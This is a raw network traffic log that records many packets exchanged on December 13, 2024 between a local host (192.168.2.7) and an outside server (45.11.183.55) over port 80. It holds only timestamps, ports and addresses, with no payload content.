Dec 13, 2024 18:53:24.089298010 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.089339972 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.089674950 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.089721918 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.089833021 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.089876890 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.091366053 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.091377974 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.091419935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.092953920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.092964888 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.093005896 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.093841076 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.093852997 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.093888998 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.094357967 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.094368935 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.094420910 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.095797062 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.095807076 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.095850945 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.096858025 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.096869946 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.096903086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.098627090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.098639011 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.098670959 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.099371910 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.099384069 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.099420071 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.100306034 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.100352049 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.100785971 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.100832939 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.101861954 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.101874113 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.101910114 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.102963924 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.102977037 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.103013992 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.104036093 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.104048014 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.104084015 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.105119944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.105161905 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.105834961 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.105881929 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.106461048 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.106472969 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.106508017 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.107518911 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.107558966 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.107593060 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.107637882 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.108875990 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.108886957 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.108917952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.108928919 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.110151052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.110162973 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.110198975 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.111365080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.111413956 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.111618042 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.111661911 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.112365007 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.112410069 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.112488031 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.112530947 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.113776922 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.113825083 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.242773056 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.242786884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.242844105 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.242933989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.242944956 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.242979050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.245029926 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.245040894 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.245073080 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.245235920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.245280981 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.245414019 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.245457888 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.246494055 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.246540070 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.247350931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.247399092 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.248375893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.248388052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.248421907 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.249154091 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.249164104 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.249198914 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.250380039 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.250391960 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.250422955 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.251360893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.251411915 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.252641916 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.252652884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.252686024 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.253722906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.253767014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.254599094 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.254609108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.254647017 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.255357027 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.255367041 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.255400896 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.255424976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.257178068 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.257189989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.257227898 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.257725954 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.257738113 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.257776976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.259047985 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.259059906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.259093046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.259119034 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.260109901 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.260122061 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.260159016 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.261045933 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.261058092 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.261092901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.262288094 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.262300014 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.262336016 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.263362885 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.263375044 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.263411045 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.265645981 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.265657902 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.265690088 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.265693903 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.265728951 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.265744925 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.265786886 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.267360926 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.267374039 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.267407894 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.267419100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.268865108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.268877029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.268913984 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.269843102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.269855976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.269889116 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.270632029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.270648003 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.270684958 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.272114992 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.272126913 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.272162914 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.273206949 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.273217916 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.273248911 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.273272991 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.274246931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.274259090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.274297953 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.275325060 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.275369883 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.275711060 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.275757074 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.276607990 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.276622057 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.276659012 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.277719021 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.277731895 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.277765036 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.277790070 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.278954029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.279000998 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.279122114 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.279171944 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.280278921 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.280291080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.280328989 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.281604052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.281651020 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.281706095 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.281753063 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.283128023 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.283174038 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.283175945 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.283221960 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.284214020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.284228086 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.284259081 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.284269094 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.285446882 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.285459995 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.285494089 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.286369085 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.286412954 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.286555052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.286595106 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.287364960 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.287375927 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.287412882 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.288705111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.288717031 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.288754940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.289763927 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.289773941 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.289812088 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.290841103 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.290885925 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.290954113 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.290997028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.292068958 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.292114973 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.292187929 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.292236090 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.293296099 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.293308020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.293339014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.293356895 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.294456959 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.294504881 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.294523954 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.294562101 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.295942068 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.295953035 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.295989990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.296936989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.296947002 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.296983957 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.298069954 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.298113108 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.298183918 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.298223019 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.299280882 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.299329996 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.299392939 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.299437046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.300635099 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.300647020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.300683022 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.301728010 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.301738977 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.301776886 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.302866936 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.302885056 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.302916050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.302936077 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.304167032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.304179907 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.304214954 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.305221081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.305258989 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.434449911 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.434515953 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.434514046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.434560061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.434993029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.435014963 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.435039997 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.435051918 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.435894012 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.435939074 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.436003923 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.436048031 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.437144041 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.437190056 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.437238932 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.437279940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.438292980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.438352108 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.438385010 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.438426018 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.439464092 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.439507961 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.439567089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.439610004 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.440788984 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.440831900 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.440927029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.440970898 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.441947937 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.441999912 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.442081928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.442125082 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.443192959 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.443250895 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.443336964 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.443389893 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.444266081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.444308996 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.444343090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.444384098 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.445439100 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.445501089 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.445564032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.445606947 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.446676970 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.446717978 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.446835995 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.446878910 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.447885990 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.447931051 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.447978020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.448019028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.449055910 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.449100018 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.449181080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.449220896 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.450277090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.450326920 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.450347900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.450391054 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.451471090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.451522112 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.451562881 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.451602936 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.452613115 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.452652931 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.452759027 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.452801943 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.453898907 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.453943014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.454021931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.454061985 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.455018997 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.455060005 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.455106020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.455147028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.456327915 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.456376076 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.456409931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.456449986 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.457484961 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.457528114 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.457568884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.457619905 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.458621979 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.458667994 CET	49847	80	192.168.2.7	45.11.183.55
